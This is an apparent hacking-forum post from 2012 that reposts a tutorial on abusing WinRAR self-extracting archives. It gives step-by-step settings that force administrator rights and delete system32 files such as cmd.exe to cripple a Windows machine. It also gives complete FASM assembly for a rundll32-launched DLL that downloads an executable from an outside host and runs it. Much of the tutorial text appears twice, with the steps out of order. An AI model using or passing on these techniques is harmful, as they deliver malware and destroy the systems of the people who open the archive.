Saturday, March 24, 2012
hi guys i found this made by DarkComet Coder and it's awsom chek it
You need
- Rundll32
-FASM (Flat Assembler)
now let's be BAD
For our last example regarding the very “secure” SFX option in WinRAR I will now show how to completely destroy an entire machine using only SFX options.
The SFX manager includes two other dangerous functions (Run as administrator and Delete files after extraction). The option Run as administrator will ask to run it as admin, so the SFX will have all the rights on the system and, after extraction, the delete files will be usefull to do harmful things in the system.
To use this option follow the steps:
- Create a new SFX package and go to SFX options (now you know how to)
- In SFX options go to Advanced tab and tick the box “Ask for administrator rights” (I don’t know if it is spelled like that as I’m on a French system)
- Then in the first input “Delete files” enter the list of files you want to delete separated by a white space (example : rundll32.exe cmd.exe hello.exe…..)
- Now go back to the general tab and put as extraction path :
And now you can generate the SFX.
Warning it is just an example, don’t run it it could potentially destroy your entire system if you put important files in the file to delete list
If you do want to test, please do it in a Virtual Machine with Time Machine installed to roll back.
Quick resume of what it do:
Basically this example will delete rundll32.exe, cmd.exe and hello.exe from the system32 during the extraction.
Notice the delete files function only work in the extraction path thats why I chose system32 in extract path and we got the rights to extract in because I force the SFX to be run as administrator.
Thats all.
Quote:
|
;------------------------------- ; SFX Downloader via RunDLL32 ; Snippet by DarkCoderSc ; unremote.org ;------------------------------- format PE GUI 4.0 DLL entry DllEntryPoint include 'win32a.inc' ;-- rw section '.data' data readable writeable CMD_OPEN db 'open',0 url db 'http://unremote.org/test.exe',0 output db 'c:\\test.exe',0 errmsg db 'ERROR',0 errtitle db '',0 okmsg db 'OK',0 oktitle db '',0 section '.text' code readable executable proc DllEntryPoint hinstDLL, fdwReason, lpvReserved mov eax,TRUE ret endp ;-- This is the function we call via rundll32 via the SFX arg line proc dcscdownload xor eax, eax invoke URLDownloadToFile, 0, url, output, 0, NULL ; download cmp eax, 0 jne enderr invoke ShellExecute, 0, CMD_OPEN, output, 0, 0, SW_SHOW ; execute jmp endok enderr: invoke MessageBox, 0, errmsg, errtitle,0 jmp endpr endok: invoke MessageBox, 0, okmsg, oktitle,0 endpr: ret endp ;-- Import and export table section '.idata' import data readable writeable library kernel,'KERNEL32.DLL',\ urlmon,'URLMON.DLL',\ Shell32,'SHELL32.DLL',\ user,'USER32.DLL' import Shell32,\ ShellExecute,'ShellExecuteA' import user,\ MessageBox,'MessageBoxA' import urlmon,\ URLDownloadToFile,'URLDownloadToFileA' section '.edata' export data readable export 'OURDLL.DLL',\ dcscdownload,'dcscdownload' section '.reloc' fixups data discardable |
- Rundll32
-FASM (Flat Assembler)
now let's be BAD
For our last example regarding the very “secure” SFX option in WinRAR I will now show how to completely destroy an entire machine using only SFX options.
The SFX manager includes two other dangerous functions (Run as administrator and Delete files after extraction). The option Run as administrator will ask to run it as admin, so the SFX will have all the rights on the system and, after extraction, the delete files will be usefull to do harmful things in the system.
To use this option follow the steps:
- Create a new SFX package and go to SFX options (now you know how to)
- In SFX options go to Advanced tab and tick the box “Ask for administrator rights” (I don’t know if it is spelled like that as I’m on a French system)
- Then in the first input “Delete files” enter the list of files you want to delete separated by a white space (example : rundll32.exe cmd.exe hello.exe…..)
- Now go back to the general tab and put as extraction path :
Quote:
| %SYSTEMDRIVE%\windows\system32\ |
Warning it is just an example, don’t run it it could potentially destroy your entire system if you put important files in the file to delete list
If you do want to test, please do it in a Virtual Machine with Time Machine installed to roll back.
Quick resume of what it do:
Basically this example will delete rundll32.exe, cmd.exe and hello.exe from the system32 during the extraction.
Notice the delete files function only work in the extraction path thats why I chose system32 in extract path and we got the rights to extract in because I force the SFX to be run as administrator.
Thats all.